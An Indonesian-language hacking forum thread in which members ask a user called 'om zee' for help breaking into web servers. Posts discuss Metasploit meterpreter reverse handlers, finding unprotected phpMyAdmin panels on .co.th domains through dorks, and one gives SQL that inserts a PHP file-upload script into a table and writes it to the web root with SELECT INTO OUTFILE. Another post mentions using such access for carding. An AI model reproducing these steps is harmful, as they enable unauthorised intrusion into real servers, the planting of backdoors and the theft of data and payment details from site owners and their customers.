[Junior Riau]

Posting pake windows ...apakah saya larang ? baca baik2 bro ...."gunakan windows asli" bukan msalah pake windows om ...tapi itu ajakan untuk tidak melakukan pembajakan bukan penggunaan ....ckkccckkck sekali lagi itu hanya ajakan..... baca dulu baik2 thread baru comment ya... ane paling gk suka di thread ane ada spammers ! ....

om zee ngamuk :-|

[civo]

nah ane punya sedikit problem nih
setiap ane buat payload dengan memakai LHOST IP publik ane...
ane ga pernah mendapat session meterpreternya...
selalu jadi kaya gini

Code:

[-] Handler failed to bind to IP ane:4444
[*] Started reverse handler on 0.0.0.0:4444

itu kenapa yaaa

[Junior Riau]

omm nemu kayak beginian juga wkwkwk saat nya ikutin petunjuk yang diatas ni wkwkwkw
malaikat bertanduk mode on > wkwkw

---

om kalau untuk unix gimana?? sma kah??
ini infonya
Web Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Resin/3.1.10 Sun-ONE-ASP/4.0.3

[Junior Riau]

om zee ini kasusnya g adapat privileges,,gimana tuh??
bisa??

[fake666]

oh ya om zee
itu celah di phpmyadminya cara kita mengetahuinya gimana ya?
apakah tinggal di masukin site/phpmyadmin/ aja ??

[Junior Riau]

@fake666,,sbenarnya bukan celah,,itu krena kelalaian adminnya tdak memberi proteksi,,
contok sperti yg ane temukan,,
kalau mau coba cari coba domain co.th :p
ketik aja co.th/phpmyadmin/
mungkin nemu kalau beruntung sperti ane

[zee eichel]

nah ane punya sedikit problem nih
setiap ane buat payload dengan memakai LHOST IP publik ane...
ane ga pernah mendapat session meterpreternya...
selalu jadi kaya gini

Code:

[-] Handler failed to bind to IP ane:4444
[*] Started reverse handler on 0.0.0.0:4444

itu kenapa yaaa

Itu anda tidak memiliki IP publik.. apakah targetnya NAT ? ..

omm nemu kayak beginian juga wkwkwk saat nya ikutin petunjuk yang diatas ni wkwkwkw
malaikat bertanduk mode on > wkwkw

---

om kalau untuk unix gimana?? sma kah??
ini infonya
Web Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Resin/3.1.10 Sun-ONE-ASP/4.0.3

klo soal sistem operasi kita harus tau direktori default dari web server

om zee ini kasusnya g adapat privileges,,gimana tuh??
bisa??

nah terus bisa masuk gitu apakah bukan privilage yang tertinggi ?

oh ya om zee
itu celah di phpmyadminya cara kita mengetahuinya gimana ya?
apakah tinggal di masukin site/phpmyadmin/ aja ??

cara mengetahuinya biasanya memakai dork2 tertentu

[Junior Riau]

info server nya ini

Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Resin/3.1.10 Sun-ONE-ASP/4.0.3 Server at www.xxx.xxx Port 80

OS servernya Unix om, nah mau upload kemana waktu jalanin sql query kayak om tuh?

Code:

INSERT INTO tj_tblcatalogue (CatalogueNameThai) values ('<?php $uploaddir = "[color=#0000CD]upload direktori[/color]";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "
";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "
";?>');
SELECT * INTO OUTFILE '[i]g tau tempat ni[/i]' from tj_tblcatalogue
FLUSH LOGS;

test jalanin flush logs



kalau untuk query insert update delete bisa dijalanin,
soalnya kan beda sama windows, atau ke direktori apche2 nya yang di /var/www/htdocs ??

[Veronochi]

wew...

itu yang di gunakan server windows ya om..

kan itu bisa di card*ng
ngeri juga...

[cyber.wolf$]

Wah ntar pulang kerja ane coba...
Thanks Om Zee...
:-D